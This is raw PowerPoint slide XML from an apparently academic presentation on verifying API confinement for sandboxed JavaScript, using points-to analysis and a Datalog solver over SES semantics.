            <a:pPr marL="0" lvl="2" indent="-274320"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Written in a disciplined manner</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2" indent="-274320"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Developers have an incentive in keeping the code simple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Insights: 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/>
              <a:t>Conservative and scalable static analysis techniques can do well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/>
              <a:t>Can soundly establish API Confinement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/>
              <a:t>Can warn developers away from using complex coding patterns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the API Confinement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1502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API Confinement Problem: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Given  trusted code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> and a set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>critical</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> of critical references, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>verify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>Confine(t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>, critical</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="685800" y="2438400"/>
            <a:ext cx="8915400" cy="584776"/>
            <a:chOff x="228600" y="1929824"/>
            <a:chExt cx="8915400" cy="584776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1929824"/>
              <a:ext cx="4953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</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent3"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>t</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent3"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> ;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent3"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                </a:rPr>
                <a:t>eval(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" i="1" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman Bold Italic"/>
                  <a:cs typeface="Times New Roman Bold Italic"/>
                </a:rPr>
                <a:t>s</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="376092"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                </a:rPr>
                <a:t>,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</a:rPr>
                <a:t>“api”,”test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</a:rPr>
                <a:t>”</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent3"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                </a:rPr>
                <a:t>)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="18" name="Curved Connector 17"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="600000" flipV="1">
              <a:off x="5325092" y="2126016"/>
              <a:ext cx="1824766" cy="30869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67600" y="1969927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/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>end</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3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27" name="Rounded Rectangular Callout 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="3429000"/>
            <a:ext cx="2133600" cy="889144"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -16031"/>
              <a:gd name="adj2" fmla="val -1026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 smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Trusted API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alibri"/>
              </a:rPr>
              <a:t>Implementation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p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362200" y="3429432"/>
            <a:ext cx="2209800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -44972"/>
              <a:gd name="adj2" fmla="val -1495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Untrusted code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219700" y="3302720"/>
            <a:ext cx="3429000" cy="1015856"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -65950"/>
              <a:gd name="adj2" fmla="val -845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Challenge </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri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: untrusted code must set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>”test”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 to a critical reference to win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152400" y="3835256"/>
            <a:ext cx="8839200" cy="965344"/>
            <a:chOff x="152400" y="3352800"/>
            <a:chExt cx="8839200" cy="965344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Rounded Rectangle 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="152400" y="3352800"/>
              <a:ext cx="8839200" cy="96534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 err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>Confine(t</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>, critical)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 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>For all untrusted terms </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1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>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> in SES, 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92100" y="3886200"/>
              <a:ext cx="7937500" cy="317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3" grpId="0" animBg="1"/>
      <p:bldP spid="23" grpId="1" animBg="1"/>
      <p:bldP spid="23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3450"/>
            <a:ext cx="8686800" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="-18288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Hurdles:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-283464">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0"/>
              <a:t>Forall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t> quantification on untrusted code </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-283464">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Analysis of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>eval(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>,…,</a:t>
            </a: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 err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" baseline="-25000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> general</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182880" indent="-274320">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0" smtClean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750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Techniques:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-283464"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Flow-Insensitive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00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Context-Insensitive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t> Points-to analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-283464">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t> abstract </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>eval(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>,…,</a:t>
            </a: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 err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" baseline="-25000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> by the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" u="sng" dirty="0" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>set of all statements</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> that can be written using free variables {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>,…,</a:t>
            </a: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 err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" baseline="-25000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>}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endParaRPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="-274320"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="152400" y="1295400"/>
            <a:ext cx="8839200" cy="965344"/>
            <a:chOff x="152400" y="3352800"/>
            <a:chExt cx="8839200" cy="965344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Rounded Rectangle 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="152400" y="3352800"/>
              <a:ext cx="8839200" cy="96534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 err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>Confine(t</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>, critical)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 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>For all untrusted terms </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0000FF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>
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> in SES</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>, 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92100" y="3886200"/>
              <a:ext cx="7937500" cy="317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Sandboxing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4953000" cy="2667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Constraints: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Solution MUST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-283464"/>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>not require browser modification</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-283464"/>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>have provable guarantees</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-283464"/>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>allow a practically useful subset of JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="740664" lvl="1" indent="-283464">
              <a:buNone/>
            </a:pP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1066800"/>
            <a:ext cx="89916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14350"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Problem:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Design sandboxing mechanisms for untrusted JavaScript in order to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-36576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protect </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>critical resources belonging to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hosting page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-36576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protect resources belonging to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>other third-party components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05400" y="3886200"/>
            <a:ext cx="3657600" cy="2362200"/>
            <a:chOff x="5334000" y="3810000"/>
            <a:chExt cx="3657600" cy="2362200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Oval 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6324600" y="4572000"/>
              <a:ext cx="1676400" cy="7883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Existing JS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sandboxing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(FBJS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0" smtClean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334000" y="3810000"/>
              <a:ext cx="3657600" cy="23622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2600" y="4202668"/>
              <a:ext cx="45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JS</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="22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5867400" y="3048000"/>
            <a:ext cx="2286000" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 3728"/>
              <a:gd name="adj2" fmla="val 13657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 want to be in this region</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Oval 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5638800" y="4343400"/>
            <a:ext cx="2514600" cy="1447800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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Verifying </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>Confine(t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>, critical)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6032" y="3282563"/>
            <a:ext cx="2135604" cy="38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Trusted code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032" y="4173957"/>
            <a:ext cx="2135604" cy="635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eval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with free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vars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”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test”,“api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”</a:t>
            </a:r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032" y="5343270"/>
            <a:ext cx="2135604" cy="603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Environment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(Built-ins)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032" y="4733670"/>
            <a:ext cx="2135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urier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>+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032" y="3551984"/>
            <a:ext cx="2135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urier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>+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2746375"/>
            <a:ext cx="2362200" cy="3273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90800" y="4267200"/>
            <a:ext cx="609600" cy="3048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4" name="Alternate Process 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3352800" y="3581399"/>
            <a:ext cx="2209800" cy="182893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alibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Datalog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 Solver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(least fixed point) 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2057400"/>
            <a:ext cx="29718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Inference  Rules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(SES semantics)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191000" y="3044693"/>
            <a:ext cx="304800" cy="46050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8" name="Decision 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6324600" y="3733800"/>
            <a:ext cx="2742404" cy="1208759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4084020"/>
            <a:ext cx="274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Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>Stack(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>“test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>l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en-US" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t> ∧</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Times"/>
              <a:ea typeface="ＭＳ ゴシック"/>
              <a:cs typeface="Times"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:ea typeface="ＭＳ ゴシック"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>Critical(l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:ea typeface="ＭＳ ゴシック"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:ea typeface="ＭＳ ゴシック"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="31" name="Straight Arrow Connector 30"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="28" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="7314802" y="3352800"/>
            <a:ext cx="762000" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="50800">
            <a:solidFill>
              <a:schemeClr val="accent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5638800" y="4191000"/>
